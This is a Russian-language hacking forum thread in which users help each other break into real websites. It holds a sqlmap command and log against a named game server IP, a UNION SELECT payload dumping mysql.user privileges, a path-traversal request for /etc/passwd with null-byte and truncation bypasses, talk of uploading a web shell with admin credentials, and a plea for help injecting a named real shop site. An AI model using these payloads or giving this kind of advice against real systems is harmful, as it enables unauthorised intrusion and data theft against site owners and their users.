06.01.2014, 18:22
|
|
Новичок
Регистрация: 10.03.2013
Сообщений: 1
С нами:
6934646
Репутация:
0
|
|
Просканировал с помощью sqlmap один игровой сервер
sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890"
в логе написало:
......
[16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'
.....
[16:51:10] [WARNING] POST parameter 'position' is not injectable
[16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
.....
Тестировал несколько раз.
Просмотрев лог запросов увидел что срабатывало на
position=-6458' OR (3053=8541)
position=0%22%29%20AND%206045%3D4434%20AND%20%28%2 2sLat%22%3D%22sLat
position=0%20AND%205338%3D7364
Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету).
Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access или нет?)
|
|
|
06.01.2014, 18:55
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user
не выводит: Y, N
В чем ошибка? Как узнать права?!
|
|
|
|
06.01.2014, 21:54
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Always
+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user
не выводит: Y, N
В чем ошибка? Как узнать права?!
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
|
|
|
|
06.01.2014, 22:04
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
Сообщение от попугай
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
есть!
|
|
|
|
07.01.2014, 14:32
|
|
Новичок
Регистрация: 03.09.2010
Сообщений: 2
С нами:
8258006
Репутация:
0
|
|
бандиты подскажите плз
короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
короче беда, подскажите че придумать можно?
|
|
|
|
07.01.2014, 15:31
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от x.Com
бандиты подскажите плз
короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
короче беда, подскажите че придумать можно?
ищи админку
|
|
|
|
08.01.2014, 04:14
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
как крутить подобное ?
Код:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
|
|
|
|
08.01.2014, 13:00
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от psihoz26
как крутить подобное ?
Код:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
/etc/passwd%00 или /etc/passwd[////4096////]
|
|
|
|
08.01.2014, 19:14
|
|
Новичок
Регистрация: 03.09.2010
Сообщений: 2
С нами:
8258006
Репутация:
0
|
|
Сообщение от Konqi
ищи админку
дык найти не могу, второй день сижу уже, все перепробывал
|
|
|
|
08.01.2014, 23:22
|
|
Новичок
Регистрация: 08.02.2011
Сообщений: 11
С нами:
8030486
Репутация:
0
|
|
Ребята помогите раскрутить mssql не как не доходит!
http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
